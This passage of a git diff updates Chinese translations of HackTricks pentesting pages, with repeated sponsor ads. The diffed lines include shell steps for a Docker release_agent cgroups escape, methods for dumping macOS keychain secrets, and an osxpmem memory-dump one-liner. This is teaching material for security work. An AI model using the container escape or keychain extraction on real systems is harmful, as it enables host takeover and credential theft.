您可以访问他们的网站并免费尝试他们的引擎:
@ -298,7 +298,7 @@ WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

26
linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md
View file

@ -1,4 +1,4 @@
# Docker release_agent cgroups escape
# Docker release_agent cgroups逃逸
<details>
@ -6,19 +6,19 @@
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS Family**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 如果您想看到您的**公司在HackTricks中广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASSHackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS Family**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上**关注**我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
@ -60,7 +60,7 @@ host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
```
4. **创建和配置/cmd脚本:**
- 在容器内创建/cmd脚本并配置执行ps aux命令将输出重定向到容器中名为/output的文件中。指定主机上/output的完整路径。
- 在容器内创建/cmd脚本并配置执行ps aux命令将输出重定向到容器中名为/output的文件中。指定主机上/output的完整路径。
```shell
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
@ -68,13 +68,13 @@ chmod a+x /cmd
```
5. **触发攻击:**
- 在"x"子cgroup中启动一个进程然后立即终止。
- 这将触发`release_agent`(即/cmd脚本,该脚本在主机上执行ps aux命令并将输出写入容器内的/output。
- 这将触发`release_agent`(即/cmd脚本在主机上执行ps aux命令并将输出写入容器内的/output。
```shell
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
```
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
@ -92,7 +92,7 @@ WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

60
macos-hardening/macos-red-teaming/macos-keychain.md
View file

@ -1,4 +1,4 @@
# macOS密钥链
# macOS钥匙串
<details>
@ -8,17 +8,17 @@
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
@ -28,20 +28,20 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
---
## 主要密钥链
## 主要钥匙串
* **用户密钥链**`~/Library/Keychains/login.keycahin-db`),用于存储诸如应用程序密码、互联网密码、用户生成的证书、网络密码和用户生成的公钥/私钥等**特定于用户**的凭据。
* **系统密钥链**`/Library/Keychains/System.keychain`),存储**系统范围**的凭据如WiFi密码、系统根证书、系统私钥和系统应用程序密码。
* **用户钥匙串**`~/Library/Keychains/login.keycahin-db`),用于存储诸如应用程序密码、互联网密码、用户生成的证书、网络密码和用户生成的公钥/私钥等**特定于用户**的凭据。
* **系统钥匙串**`/Library/Keychains/System.keychain`),存储**系统范围**的凭据如WiFi密码、系统根证书、系统私钥和系统应用程序密码。
### 密码密钥链访问
### 密码钥匙串访问
这些文件虽然没有固有的保护措施,可以被**下载**,但它们是加密的,需要**用户的明文密码才能解密**。可以使用类似[**Chainbreaker**](https://github.com/n0fate/chainbreaker)的工具进行解密。
这些文件虽然没有固有的保护措施,可以被**下载**,但它们是加密的,需要**用户的明文密码才能解密**。可以使用类似[**Chainbreaker**](https://github.com/n0fate/chainbreaker)的工具进行解密。
## 密钥链条目保护
## 钥匙串条目保护
### ACLs
密钥链中的每个条目都受**访问控制列表ACLs**的管辖,这些列表规定了谁可以对密钥链条目执行各种操作,包括:
钥匙串中的每个条目都受**访问控制列表ACLs**的管辖ACLs规定了谁可以在钥匙串条目上执行各种操作,包括:
* **ACLAuhtorizationExportClear**:允许持有者获取密钥的明文。
* **ACLAuhtorizationExportWrapped**:允许持有者获取使用另一个提供的密码加密的明文。
@ -55,11 +55,11 @@ ACLs还伴随着一个**可信应用程序列表**,这些应用程序可以在
此外,条目可能包含**`ACLAuthorizationPartitionID`**密钥,用于识别**teamid、apple**和**cdhash**。
* 如果指定了**teamid**,则为了**在没有**提示的情况下访问条目值,使用的应用程序必须具有**相同的teamid**。
* 如果指定了**teamid**,则为了**无需提示地访问**条目值,使用的应用程序必须具有**相同的teamid**。
* 如果指定了**apple**,则应用程序需要由**Apple**签名。
* 如果指定了**cdhash**,则**应用程序**必须具有特定的**cdhash**。
* 如果指定了**cdhash**,则应用程序必须具有特定的**cdhash**。
### 创建密钥链条目
### 创建钥匙串条目
当使用**`Keychain Access.app`**创建**新**的**条目**时,适用以下规则:
@ -69,7 +69,7 @@ ACLs还伴随着一个**可信应用程序列表**,这些应用程序可以在
* 没有应用程序可以更改ACLs。
* **partitionID**设置为**`apple`**。
当**应用程序**在密钥链中创建条目时,规则略有不同:
当**应用程序在钥匙串中创建条目**时,规则略有不同:
* 所有应用程序都可以加密。
* 只有**创建应用程序**(或明确添加的任何其他应用程序)可以导出/解密(无需提示用户)。
@ -77,7 +77,7 @@ ACLs还伴随着一个**可信应用程序列表**,这些应用程序可以在
* 没有应用程序可以更改ACLs。
* **partitionID**设置为**`teamid:[teamID here]`**。
## 访问密钥链
## 访问钥匙串
### `security`
```bash
@ -93,21 +93,21 @@ security set-generic-password-parition-list -s "test service" -a "test acount" -
### APIs
{% hint style="success" %}
**密钥链枚举和转储**不会生成提示的机密可以使用工具[**LockSmith**](https://github.com/its-a-feature/LockSmith)完成
**密钥链枚举和转储**不会生成提示的机密可以使用工具[**LockSmith**](https://github.com/its-a-feature/LockSmith)完成
{% endhint %}
列出并获取每个密钥链条目的**信息**
* API **`SecItemCopyMatching`** 提供每个条目的信息,使用时可以设置一些属性:
* **`kSecReturnData`**如果为true将尝试解密数据设置为false可避免潜在的弹出窗口
* **`kSecReturnRef`**:还可以获取密钥链条目的引用(如果后来发现可以无弹出窗口的情况下解密则设置为true
* **`kSecReturnRef`**:还可以获取密钥链条目的引用(如果后来发现可以无弹出窗口解密则设置为true
* **`kSecReturnAttributes`**:获取条目的元数据
* **`kSecMatchLimit`**:返回多少结果
* **`kSecClass`**:密钥链条目的类型
获取每个条目的**ACL**
* 使用API **`SecAccessCopyACLList`** 可以获取密钥链条目的**ACL**它将返回一个ACL列表如`ACLAuhtorizationExportClear`和之前提到的其他),其中每个列表包括:
* 使用API **`SecAccessCopyACLList`** 可以获取密钥链条目的**ACL**它将返回一个ACL列表如`ACLAuhtorizationExportClear`和之前提到的其他ACL),其中每个列表包括:
* 描述
* **受信任应用程序列表**。这可以是:
* 一个应用程序:/Applications/Slack.app
@ -119,15 +119,15 @@ security set-generic-password-parition-list -s "test service" -a "test acount" -
* API **`SecKeychainItemCopyContent`** 获取明文
* API **`SecItemExport`** 导出密钥和证书,但可能需要设置密码以加密导出内容
以下是**无需提示即可导出机密****要求**
以下是**无需提示即可导出机密的要求**
* 如果列出了**1个或更多受信任的**应用程序:
* 需要适当的**授权****`Nil`**,或者是允许访问机密信息的授权应用程序列表的一部分)
* 需要代码签名与**PartitionID**匹配
* 需要代码签名与一个**受信任应用程序**的代码签名匹配或者是正确的KeychainAccessGroup的成员
* 需要适当的**授权****`Nil`**,或者是授权访问机密信息的应用程序允许列表的一部分)
* 需要代码签名匹配**PartitionID**
* 需要代码签名与一个**受信任应用程序**匹配或者是正确的KeychainAccessGroup的成员
* 如果**所有应用程序都受信任**
* 需要适当的**授权**
* 需要代码签名与**PartitionID**匹配
* 需要代码签名匹配**PartitionID**
* 如果**没有PartitionID**,则不需要这个
{% hint style="danger" %}
@ -146,15 +146,15 @@ security set-generic-password-parition-list -s "test service" -a "test acount" -
* [**#OBTS v5.0: "Lock Picking the macOS Keychain" - Cody Thomas**](https://www.youtube.com/watch?v=jKE1ZW33JpY)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**推动的搜索引擎,提供**免费**功能,用于检查公司或其客户是否已受到**窃取恶意软件**的**侵害**。
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**推动的搜索引擎,提供**免费**功能,用于检查公司或其客户是否已受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
您可以在以下网址检查他们的网站并尝试他们的引擎,**免费**使用
您可以访问他们的网站并免费尝试他们的引擎
{% embed url="https://whiteintel.io" %}
@ -166,7 +166,7 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family)我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* 发现我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

44
macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md
View file

@ -2,21 +2,21 @@
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
@ -28,15 +28,15 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
---
## 内存遗
## 内存遗物
### 交换文件
交换文件,例如`/private/var/vm/swapfile0`,在物理内存已满时充当**缓存**。当物理内存没有足够空间时数据会转移到交换文件然后根据需要重新转移到物理内存。可能存在多个交换文件名称类似于swapfile0、swapfile1等。
交换文件,例如`/private/var/vm/swapfile0`,在物理内存已满时充当**缓存**。当物理内存没有足够空间时,数据会转移到交换文件然后根据需要重新转移到物理内存。可能存在多个交换文件名称类似于swapfile0、swapfile1等。
### 休眠镜像
位于`/private/var/vm/sleepimage`的文件在**休眠模式**期间至关重要。**当OS X休眠时内存中的数据存储在此文件中**。唤醒计算机时,系统会从此文件中检索内存数据,使用户可以继续上次的操作。
位于`/private/var/vm/sleepimage`的文件在**休眠模式**期间至关重要。**当OS X休眠时内存中的数据存储在此文件中**。唤醒计算机时,系统会从此文件中检索内存数据,使用户可以继续之前的操作。
值得注意的是在现代MacOS系统上出于安全原因此文件通常是加密的使恢复变得困难。
@ -48,9 +48,9 @@ MacOS系统中另一个重要的与内存相关的文件是**内存压力日志*
## 使用osxpmem转储内存
要在MacOS机器转储内存,可以使用[**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip)。
要在MacOS机器转储内存,可以使用[**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip)。
**注意**以下说明仅适用于具有Intel架构的Mac。该工具现已存档最后一次发布是在2017年。使用以下说明下载的二进制文件针对Intel芯片因为在2017年时Apple Silicon还不存在。可能可以为arm64架构编译二进制文件但您需要自行尝试。
**注意**以下说明仅适用于具有Intel架构的Mac。该工具现已存档最后一次发布是在2017年。以下说明下载的二进制文件针对Intel芯片因为在2017年时Apple Silicon还不存在。可能可以为arm64架构编译二进制文件但您需要自行尝试。
```bash
#Dump raw format
sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
@ -65,22 +65,22 @@ sudo kextutil "/tmp/MacPmem.kext"
#Allow the kext in "Security & Privacy --> General"
sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
```
**其他错误**可能通过在“安全性与隐私 --> 通用”中**允许加载kext**来修复,只需**允许**它。
**其他错误**可能通过在“安全性与隐私 --> 一般”中**允许加载kext**来修复,只需**允许**它。
您还可以使用这个**一行命令**来下载应用程序加载kext并转储内存
{% code overflow="wrap" %}
```bash
sudo su
cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip; unzip osxpmem-2.1.post4.zip; chown -R root:wheel osxpmem.app/MacPmem.kext; kextload osxpmem.app/MacPmem.kext; osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
```
## WhiteIntel
{% endcode %}
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
### [WhiteIntel](https://whiteintel.io)
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -88,14 +88,14 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家,使用</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
支持HackTricks的其他方式
支持 HackTricks 的其他方式:
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord **](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
</details>

28
macos-hardening/macos-security-and-privilege-escalation/macos-users.md
View file

@ -6,19 +6,19 @@
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**威胁**。
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
@ -30,12 +30,12 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
### 常见用户
- **Daemon**:为系统守护程序保留的用户。默认的守护程序帐户名称通常以“\_”开头
* **守护进程**:为系统守护进程保留的用户。默认的守护进程帐户名称通常以“\_”开头
```bash
_amavisd, _analyticsd, _appinstalld, _appleevents, _applepay, _appowner, _appserver, _appstore, _ard, _assetcache, _astris, _atsserver, _avbdeviced, _calendar, _captiveagent, _ces, _clamav, _cmiodalassistants, _coreaudiod, _coremediaiod, _coreml, _ctkd, _cvmsroot, _cvs, _cyrus, _datadetectors, _demod, _devdocs, _devicemgr, _diskimagesiod, _displaypolicyd, _distnote, _dovecot, _dovenull, _dpaudio, _driverkit, _eppc, _findmydevice, _fpsd, _ftp, _fud, _gamecontrollerd, _geod, _hidd, _iconservices, _installassistant, _installcoordinationd, _installer, _jabber, _kadmin_admin, _kadmin_changepw, _knowledgegraphd, _krb_anonymous, _krb_changepw, _krb_kadmin, _krb_kerberos, _krb_krbtgt, _krbfast, _krbtgt, _launchservicesd, _lda, _locationd, _logd, _lp, _mailman, _mbsetupuser, _mcxalr, _mdnsresponder, _mobileasset, _mysql, _nearbyd, _netbios, _netstatistics, _networkd, _nsurlsessiond, _nsurlstoraged, _oahd, _ondemand, _postfix, _postgres, _qtss, _reportmemoryexception, _rmd, _sandbox, _screensaver, _scsd, _securityagent, _softwareupdate, _spotlight, _sshd, _svn, _taskgated, _teamsserver, _timed, _timezone, _tokend, _trustd, _trustevaluationagent, _unknown, _update_sharing, _usbmuxd, _uucp, _warmd, _webauthserver, _windowserver, _www, _wwwproxy, _xserverdocs
```
- **Guest**:具有非常严格权限的访客帐户
* **访客**:具有非常严格权限的访客帐户
{% code overflow="wrap" %}
```bash
@ -49,9 +49,9 @@ for i in "${state[@]}"; do sysadminctl -"${i}" status; done;
### 用户权限
* **标准用户:** 最基本的用户。此用户在尝试安装软件或执行其他高级任务时需要管理员用户授予权限。他们无法自行完成这些任务。
* **管理员用户**: 大部分时间以标准用户身份运行的用户,但也被允许执行像安装软件和其他管理任务这样的根权限操作。所有属于管理员组的用户都**通过 sudoers 文件获得对 root 的访问权限**。
* **Root**: Root 是一个允许执行几乎任何操作的用户(受到诸如系统完整性保护之类的限制)。
* **标准用户:** 最基本的用户。在尝试安装软件或执行其他高级任务时,此用户需要管理员用户授予权限。他们无法自行完成这些任务。
* **管理员用户**: 大部分时间作为标准用户运行的用户,但也被允许执行 root 操作,如安装软件和其他管理任务。所有属于管理员组的用户都**通过 sudoers 文件获得对 root 的访问权限**。
* **Root**: Root 是一个允许执行几乎任何操作的用户(受到诸如系统完整性保护等保护措施的限制)。
* 例如root 将无法将文件放入 `/System`
<details>
@ -60,7 +60,7 @@ for i in "${state[@]}"; do sysadminctl -"${i}" status; done;
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 格式的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live) 上**关注**我们。

38
mobile-pentesting/android-app-pentesting/reversing-native-libraries.md
View file

@ -14,9 +14,9 @@
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
@ -28,14 +28,14 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
---
**欲了解更多信息请查看:[https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html)**
**更多信息请查看:[https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html)**
Android应用程序可以使用本地库通常用C或C++编写用于性能关键任务。恶意软件创建者也使用这些库因为它们比DEX字节码更难逆向工程。本节强调针对Android定制的逆向工程技能而不是教授汇编语言。提供ARM和x86版本的库以确保兼容性。
Android应用程序可以使用本地库通常用C或C++编写用于性能关键任务。恶意软件创建者也使用这些库因为它们比DEX字节码更难逆向工程。本节强调针对Android定制的逆向工程技能而不是教授汇编语言。提供ARM和x86版本的库以确保兼容性。
### 关键要点:
- **Android应用程序中的本地库**
- 用于性能密集型任务。
- 用C或C++编写,使逆向工程变得困难
- 用C或C++编写,使逆向工程具有挑战性
- 以`.so`共享对象格式找到类似于Linux二进制文件。
- 恶意软件创建者更喜欢本地代码以增加分析难度。
@ -50,7 +50,7 @@ Android应用程序可以使用本地库通常用C或C++编写,用于性能
- Java声明的本机方法链接到本机函数实现执行。
- **将Java方法链接到本机函数**
- **动态链接:** 本地库中的函数名称与特定模式匹配,允许自动链接。
- **动态链接:** 本地库中的函数名称与特定模式匹配,从而实现自动链接。
- **静态链接:** 使用`RegisterNatives`进行链接,提供函数命名和结构的灵活性。
- **逆向工程工具和技术:**
@ -70,3 +70,29 @@ Android应用程序可以使用本地库通常用C或C++编写,用于性能
- **调试本地库:**
